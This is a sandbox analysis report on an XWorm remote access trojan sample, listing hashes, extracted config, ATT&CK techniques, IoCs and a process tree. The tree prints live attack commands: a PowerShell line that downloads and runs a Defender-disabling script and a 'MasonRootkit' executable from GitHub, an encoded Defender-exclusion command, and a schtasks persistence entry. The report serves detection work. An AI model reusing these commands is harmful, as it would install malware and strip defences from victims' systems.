xworm | 07b6f8733155a98e4fd39d415104acc67677a6ab3ffaab73802ae5ab5bc56d5e

Analysis

max time kernel
9s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
04/03/2025, 21:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BootstrapperNew.exe
Size

2.9MB
MD5

95dc6da23a19b85742e9e88f6be99c34
SHA1

6472d33772b0827bbefa20702dc2845d91f77535
SHA256

07b6f8733155a98e4fd39d415104acc67677a6ab3ffaab73802ae5ab5bc56d5e
SHA512

a0671247f44a9fc2083456811032c7fbd3c4315deec8004ff1191911f2acf0ec97287f16d5f540c15382d84f2edc461731961071f238a2776b6c20fe076acfec
SSDEEP

49152:U8aLLZKgJlVSsCd0sRw/848jY0f4vYAPGiXKGEwILblKvf+nsXGfIjJqlRJZN+gi:UnLLIgbglw/8E0QvY4E/LbIf+nw41lRN

Score

10^/10

xworm defense_evasion discovery execution rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe

exe.dropper

https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat

Extracted

Family

xworm

Attributes

Install_directory
%port%
install_file
svchost.exe
pastebin_url
https://pastebin.com/raw/GMv8QPCE

Signatures

Detect Xworm Payload 52 IoCs

resource	yara_rule
behavioral2/files/0x0007000000022b21-4.dat	family_xworm
behavioral2/memory/4632-12-0x0000000000560000-0x0000000000574000-memory.dmp	family_xworm
behavioral2/memory/4632-454-0x000000001C1E0000-0x000000001C1F2000-memory.dmp	family_xworm
behavioral2/memory/7752-2300-0x0000000000050000-0x0000000000064000-memory.dmp	family_xworm
behavioral2/memory/8104-2327-0x0000000000770000-0x0000000000784000-memory.dmp	family_xworm
behavioral2/memory/4692-2356-0x0000000000F90000-0x0000000000FA4000-memory.dmp	family_xworm
behavioral2/memory/7124-2391-0x0000000000240000-0x0000000000254000-memory.dmp	family_xworm
behavioral2/memory/8020-2447-0x0000000000280000-0x0000000000294000-memory.dmp	family_xworm
behavioral2/memory/5516-2468-0x0000000000D30000-0x0000000000D44000-memory.dmp	family_xworm
behavioral2/memory/2664-2498-0x0000000000A90000-0x0000000000AA4000-memory.dmp	family_xworm
behavioral2/memory/7956-2567-0x00000000001A0000-0x00000000001B4000-memory.dmp	family_xworm
behavioral2/memory/7244-2603-0x00000000007C0000-0x00000000007D4000-memory.dmp	family_xworm
behavioral2/memory/2604-2634-0x0000000000C90000-0x0000000000CA4000-memory.dmp	family_xworm
behavioral2/memory/6324-2685-0x0000000000F00000-0x0000000000F14000-memory.dmp	family_xworm
behavioral2/memory/3792-2726-0x0000000000CF0000-0x0000000000D04000-memory.dmp	family_xworm
behavioral2/memory/2744-2765-0x0000000000300000-0x0000000000314000-memory.dmp	family_xworm
behavioral2/memory/2660-2876-0x0000000000EC0000-0x0000000000ED4000-memory.dmp	family_xworm
behavioral2/memory/3632-2901-0x00000000007D0000-0x00000000007E4000-memory.dmp	family_xworm
behavioral2/memory/7152-2985-0x0000000000040000-0x0000000000054000-memory.dmp	family_xworm
behavioral2/memory/2548-3051-0x00000000003A0000-0x00000000003B4000-memory.dmp	family_xworm
behavioral2/memory/2952-3080-0x0000000000FE0000-0x0000000000FF4000-memory.dmp	family_xworm
behavioral2/memory/4508-3128-0x0000000000370000-0x0000000000384000-memory.dmp	family_xworm
behavioral2/memory/536-3168-0x00000000001A0000-0x00000000001B4000-memory.dmp	family_xworm
behavioral2/memory/3088-3190-0x00000000002C0000-0x00000000002D4000-memory.dmp	family_xworm
behavioral2/memory/7132-3247-0x00000000002B0000-0x00000000002C4000-memory.dmp	family_xworm
behavioral2/memory/4176-3304-0x0000000000450000-0x0000000000464000-memory.dmp	family_xworm
behavioral2/memory/6732-3334-0x0000000000D10000-0x0000000000D24000-memory.dmp	family_xworm
behavioral2/memory/4956-3438-0x0000000000770000-0x0000000000784000-memory.dmp	family_xworm
behavioral2/memory/7608-3517-0x0000000000D80000-0x0000000000D94000-memory.dmp	family_xworm
behavioral2/memory/6432-3544-0x0000000000250000-0x0000000000264000-memory.dmp	family_xworm
behavioral2/memory/3320-3583-0x0000000000280000-0x0000000000294000-memory.dmp	family_xworm
behavioral2/memory/7372-3671-0x0000000000CE0000-0x0000000000CF4000-memory.dmp	family_xworm
behavioral2/memory/4428-3691-0x00000000001C0000-0x00000000001D4000-memory.dmp	family_xworm
behavioral2/memory/3736-3802-0x0000000000810000-0x0000000000824000-memory.dmp	family_xworm
behavioral2/memory/7560-3916-0x0000000000B80000-0x0000000000B94000-memory.dmp	family_xworm
behavioral2/memory/2744-3938-0x0000000000130000-0x0000000000144000-memory.dmp	family_xworm
behavioral2/memory/2448-3974-0x0000000000130000-0x0000000000144000-memory.dmp	family_xworm
behavioral2/memory/4604-4002-0x0000000000540000-0x0000000000554000-memory.dmp	family_xworm
behavioral2/memory/5956-4033-0x00000000003B0000-0x00000000003C4000-memory.dmp	family_xworm
behavioral2/memory/5924-4063-0x0000000000870000-0x0000000000884000-memory.dmp	family_xworm
behavioral2/memory/5780-4113-0x0000000000280000-0x0000000000294000-memory.dmp	family_xworm
behavioral2/memory/8156-4149-0x0000000000EB0000-0x0000000000EC4000-memory.dmp	family_xworm
behavioral2/memory/7408-4186-0x0000000000BD0000-0x0000000000BE4000-memory.dmp	family_xworm
behavioral2/memory/7188-4198-0x0000000000C50000-0x0000000000C64000-memory.dmp	family_xworm
behavioral2/memory/7564-4227-0x0000000000F50000-0x0000000000F64000-memory.dmp	family_xworm
behavioral2/memory/6556-4263-0x0000000000380000-0x0000000000394000-memory.dmp	family_xworm
behavioral2/memory/6576-4313-0x00000000008E0000-0x00000000008F4000-memory.dmp	family_xworm
behavioral2/memory/7600-4349-0x00000000002B0000-0x00000000002C4000-memory.dmp	family_xworm
behavioral2/memory/5936-4382-0x00000000009D0000-0x00000000009E4000-memory.dmp	family_xworm
behavioral2/memory/5508-4412-0x00000000007E0000-0x00000000007F4000-memory.dmp	family_xworm
behavioral2/memory/7284-4481-0x0000000000F60000-0x0000000000F74000-memory.dmp	family_xworm
behavioral2/memory/7956-4501-0x0000000000B50000-0x0000000000B64000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2324	powershell.exe

Checks computer location settings 2 TTPs 14 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	WMI Provider Host.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000\Control Panel\International\Geo\Nation	BootstrapperNew.exe

Executes dropped EXE 13 IoCs

pid	Process
4632	WMI Provider Host.exe
3348	WMI Provider Host.exe
628	WMI Provider Host.exe
2500	WMI Provider Host.exe
2236	WMI Provider Host.exe
4996	WMI Provider Host.exe
884	WMI Provider Host.exe
1516	WMI Provider Host.exe
1940	WMI Provider Host.exe
1644	WMI Provider Host.exe
3428	WMI Provider Host.exe
924	WMI Provider Host.exe
1924	WMI Provider Host.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
10	raw.githubusercontent.com
11	raw.githubusercontent.com
14	pastebin.com
15	pastebin.com
19	raw.githubusercontent.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in Windows directory 13 IoCs

description	ioc	Process
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe
File created	C:\Windows\WMI Provider Host.exe	BootstrapperNew.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BootstrapperNew.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
5464	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5560	schtasks.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
3412	powershell.exe
3352	powershell.exe
396	powershell.exe
396	powershell.exe
1072	powershell.exe
1072	powershell.exe
3352	powershell.exe
3352	powershell.exe
3412	powershell.exe
3412	powershell.exe
396	powershell.exe
3424	powershell.exe
3424	powershell.exe
1072	powershell.exe
2324	powershell.exe
2324	powershell.exe
3424	powershell.exe
3068	powershell.exe
3068	powershell.exe
2616	powershell.exe
2616	powershell.exe
4092	powershell.exe
4092	powershell.exe
2324	powershell.exe
3632	powershell.exe
3632	powershell.exe
3068	powershell.exe
2616	powershell.exe
4880	powershell.exe
4880	powershell.exe
4092	powershell.exe
2276	powershell.exe
2276	powershell.exe
3632	powershell.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

description	pid	Process
Token: SeDebugPrivilege	4632	WMI Provider Host.exe
Token: SeDebugPrivilege	3348	WMI Provider Host.exe
Token: SeDebugPrivilege	628	WMI Provider Host.exe
Token: SeDebugPrivilege	3352	powershell.exe
Token: SeDebugPrivilege	3412	powershell.exe
Token: SeDebugPrivilege	396	powershell.exe
Token: SeDebugPrivilege	2500	WMI Provider Host.exe
Token: SeDebugPrivilege	1072	powershell.exe
Token: SeDebugPrivilege	2236	WMI Provider Host.exe
Token: SeDebugPrivilege	4996	WMI Provider Host.exe
Token: SeDebugPrivilege	3424	powershell.exe
Token: SeDebugPrivilege	2324	powershell.exe
Token: SeDebugPrivilege	884	WMI Provider Host.exe
Token: SeDebugPrivilege	3068	powershell.exe
Token: SeDebugPrivilege	1516	WMI Provider Host.exe
Token: SeDebugPrivilege	2616	powershell.exe
Token: SeDebugPrivilege	1940	WMI Provider Host.exe
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeDebugPrivilege	1644	WMI Provider Host.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeDebugPrivilege	4880	powershell.exe
Token: SeDebugPrivilege	3428	WMI Provider Host.exe
Token: SeDebugPrivilege	924	WMI Provider Host.exe
Token: SeDebugPrivilege	2276	powershell.exe
Token: SeDebugPrivilege	1924	WMI Provider Host.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2096 wrote to memory of 3412	2096	BootstrapperNew.exe	87
PID 2096 wrote to memory of 3412	2096	BootstrapperNew.exe	87
PID 2096 wrote to memory of 3412	2096	BootstrapperNew.exe	87
PID 2096 wrote to memory of 4632	2096	BootstrapperNew.exe	89
PID 2096 wrote to memory of 4632	2096	BootstrapperNew.exe	89
PID 2096 wrote to memory of 2448	2096	BootstrapperNew.exe	90
PID 2096 wrote to memory of 2448	2096	BootstrapperNew.exe	90
PID 2096 wrote to memory of 2448	2096	BootstrapperNew.exe	90
PID 2448 wrote to memory of 3352	2448	BootstrapperNew.exe	91
PID 2448 wrote to memory of 3352	2448	BootstrapperNew.exe	91
PID 2448 wrote to memory of 3352	2448	BootstrapperNew.exe	91
PID 2448 wrote to memory of 3348	2448	BootstrapperNew.exe	93
PID 2448 wrote to memory of 3348	2448	BootstrapperNew.exe	93
PID 2448 wrote to memory of 1916	2448	BootstrapperNew.exe	94
PID 2448 wrote to memory of 1916	2448	BootstrapperNew.exe	94
PID 2448 wrote to memory of 1916	2448	BootstrapperNew.exe	94
PID 1916 wrote to memory of 396	1916	BootstrapperNew.exe	95
PID 1916 wrote to memory of 396	1916	BootstrapperNew.exe	95
PID 1916 wrote to memory of 396	1916	BootstrapperNew.exe	95
PID 1916 wrote to memory of 628	1916	BootstrapperNew.exe	96
PID 1916 wrote to memory of 628	1916	BootstrapperNew.exe	96
PID 1916 wrote to memory of 1556	1916	BootstrapperNew.exe	98
PID 1916 wrote to memory of 1556	1916	BootstrapperNew.exe	98
PID 1916 wrote to memory of 1556	1916	BootstrapperNew.exe	98
PID 1556 wrote to memory of 1072	1556	BootstrapperNew.exe	99
PID 1556 wrote to memory of 1072	1556	BootstrapperNew.exe	99
PID 1556 wrote to memory of 1072	1556	BootstrapperNew.exe	99
PID 1556 wrote to memory of 2500	1556	BootstrapperNew.exe	101
PID 1556 wrote to memory of 2500	1556	BootstrapperNew.exe	101
PID 1556 wrote to memory of 3216	1556	BootstrapperNew.exe	102
PID 1556 wrote to memory of 3216	1556	BootstrapperNew.exe	102
PID 1556 wrote to memory of 3216	1556	BootstrapperNew.exe	102
PID 3216 wrote to memory of 3424	3216	BootstrapperNew.exe	103
PID 3216 wrote to memory of 3424	3216	BootstrapperNew.exe	103
PID 3216 wrote to memory of 3424	3216	BootstrapperNew.exe	103
PID 3216 wrote to memory of 2236	3216	BootstrapperNew.exe	104
PID 3216 wrote to memory of 2236	3216	BootstrapperNew.exe	104
PID 3216 wrote to memory of 4008	3216	BootstrapperNew.exe	105
PID 3216 wrote to memory of 4008	3216	BootstrapperNew.exe	105
PID 3216 wrote to memory of 4008	3216	BootstrapperNew.exe	105
PID 4632 wrote to memory of 2324	4632	WMI Provider Host.exe	107
PID 4632 wrote to memory of 2324	4632	WMI Provider Host.exe	107
PID 4008 wrote to memory of 3068	4008	BootstrapperNew.exe	109
PID 4008 wrote to memory of 3068	4008	BootstrapperNew.exe	109
PID 4008 wrote to memory of 3068	4008	BootstrapperNew.exe	109
PID 4008 wrote to memory of 4996	4008	BootstrapperNew.exe	133
PID 4008 wrote to memory of 4996	4008	BootstrapperNew.exe	133
PID 4008 wrote to memory of 1924	4008	BootstrapperNew.exe	139
PID 4008 wrote to memory of 1924	4008	BootstrapperNew.exe	139
PID 4008 wrote to memory of 1924	4008	BootstrapperNew.exe	139
PID 1924 wrote to memory of 2616	1924	BootstrapperNew.exe	266
PID 1924 wrote to memory of 2616	1924	BootstrapperNew.exe	266
PID 1924 wrote to memory of 2616	1924	BootstrapperNew.exe	266
PID 1924 wrote to memory of 884	1924	BootstrapperNew.exe	115
PID 1924 wrote to memory of 884	1924	BootstrapperNew.exe	115
PID 1924 wrote to memory of 324	1924	BootstrapperNew.exe	116
PID 1924 wrote to memory of 324	1924	BootstrapperNew.exe	116
PID 1924 wrote to memory of 324	1924	BootstrapperNew.exe	116
PID 324 wrote to memory of 4092	324	BootstrapperNew.exe	117
PID 324 wrote to memory of 4092	324	BootstrapperNew.exe	117
PID 324 wrote to memory of 4092	324	BootstrapperNew.exe	117
PID 324 wrote to memory of 1516	324	BootstrapperNew.exe	119
PID 324 wrote to memory of 1516	324	BootstrapperNew.exe	119
PID 324 wrote to memory of 4224	324	BootstrapperNew.exe	274

C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
"C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2096
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3412
- C:\Windows\WMI Provider Host.exe
  "C:\Windows\WMI Provider Host.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4632
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2324
  - - C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe
      "C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe"
      4⤵
      PID:5296
    - - C:\ProgramData\MasonRootkit.exe
        
        "C:\ProgramData\MasonRootkit.exe"
        5⤵
        
        PID:5604
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBF87.tmp.bat""
        5⤵
        
        PID:5624
      - C:\Windows\system32\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:5464
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "WMI Provider Host" /tr "C:\Users\Admin\AppData\Roaming\WMI Provider Host.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5560
- C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
  "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
  2⤵
  - Checks computer location settings
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2448
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3352
- - C:\Windows\WMI Provider Host.exe
    "C:\Windows\WMI Provider Host.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3348
- - C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
    "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
    3⤵
    - Checks computer location settings
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1916
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:396
  - - C:\Windows\WMI Provider Host.exe
      "C:\Windows\WMI Provider Host.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:628
  - - C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
      "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
      4⤵
      Checks computer location settings
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1556
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1072
    - - C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2500
    - - C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        5⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3216
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3424
      - C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2236
      - C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        6⤵
        Checks computer location settings
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
